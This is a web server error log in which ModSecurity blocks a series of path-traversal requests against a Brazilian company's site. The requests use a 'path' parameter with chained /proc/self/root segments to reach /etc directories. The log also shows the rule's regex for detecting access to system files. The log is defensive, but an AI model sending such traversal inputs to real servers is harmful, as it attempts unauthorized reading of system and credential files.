[Fri Mar 20 01:39:31.539029 2026] [:error] [pid 27293:tid 140411733534464] [client 74.7.243.128:37092] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPg_-YZRR_7pZ7nDLBswAAA8E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 01:39:34.303016 2026] [:error] [pid 5816:tid 140411574073088] [client 74.7.241.31:35758] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPhpfmNfuxceSuAELIpAAAAdQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:39:36.885097 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.241.31:35770] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPiNa6ubjKNq_cu4aKRgAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:39:39.595013 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.241.31:52580] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPi9a6ubjKNq_cu4aKSQAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:39:41.408517 2026] [:error] [pid 5816:tid 140411632822016] [client 74.7.243.128:49750] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPjZfmNfuxceSuAELIqQAAAc0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 01:39:42.225285 2026] [:error] [pid 7545:tid 140411548894976] [client 74.7.241.31:52584] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPjn8B84UptSoTJtZDKwAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:39:42.902579 2026] [:error] [pid 7545:tid 140411658000128] [client 74.7.243.128:44700] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPjn8B84UptSoTJtZDLAAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 01:39:44.918383 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.243.128:44704] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPkAkwaGbbGflqUZAABQAAAMg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:39:44.923332 2026] [:error] [pid 7235:tid 140411590858496] [client 74.7.241.31:52590] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPkPqxLDW4GITHUkSeeQAAARI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:39:47.515206 2026] [:error] [pid 27293:tid 140411590858496] [client 74.7.241.31:42066] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPk_-YZRR_7pZ7nDLBugAAA9I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:39:50.020320 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.243.128:44716] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPlta6ubjKNq_cu4aKUAAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 01:39:50.125800 2026] [proxy_fcgi:error] [pid 26799:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:33356] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:39:50.139298 2026] [:error] [pid 7545:tid 140411716749056] [client 74.7.241.31:42068] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPln8B84UptSoTJtZDLQAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:39:52.747503 2026] [:error] [pid 21563:tid 140411590858496] [client 74.7.241.31:42084] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPmEpm7ZmxKZTM4bZ7ZQAAA5I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:39:55.541184 2026] [:error] [pid 7235:tid 140411632822016] [client 74.7.241.31:42088] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPm_qxLDW4GITHUkSefQAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:39:55.541546 2026] [mime_magic:error] [pid 7235:tid 140411632822016] (70014)End of file found: [client 74.7.241.31:42088] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:39:58.145510 2026] [:error] [pid 7235:tid 140411599251200] [client 74.7.241.31:57718] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPnvqxLDW4GITHUkSefgAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:40:03.548318 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.241.31:57722] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPowkwaGbbGflqUZAAFAAAAMA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:40:05.867344 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.241.31:57722] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPpQkwaGbbGflqUZAAGgAAAMs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:40:08.699674 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.241.31:43734] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPqMdf6f5d65gmYZSuWAAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:40:11.042247 2026] [:error] [pid 21563:tid 140411658000128] [client 74.7.241.31:43746] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPq0pm7ZmxKZTM4bZ7ewAAA4o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:40:13.355105 2026] [:error] [pid 8307:tid 140411590858496] [client 74.7.241.31:43752] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPrb-FhjpZGs9ba8qgNQAAAxI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:40:15.900536 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.241.31:43766] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPr-oXxyEfFpUF8f9BwwAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:40:17.150313 2026] [proxy_fcgi:error] [pid 14269:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:33864] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:40:18.531023 2026] [:error] [pid 7235:tid 140411574073088] [client 74.7.241.31:35526] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPsvqxLDW4GITHUkSehwAAARQ"], referer: 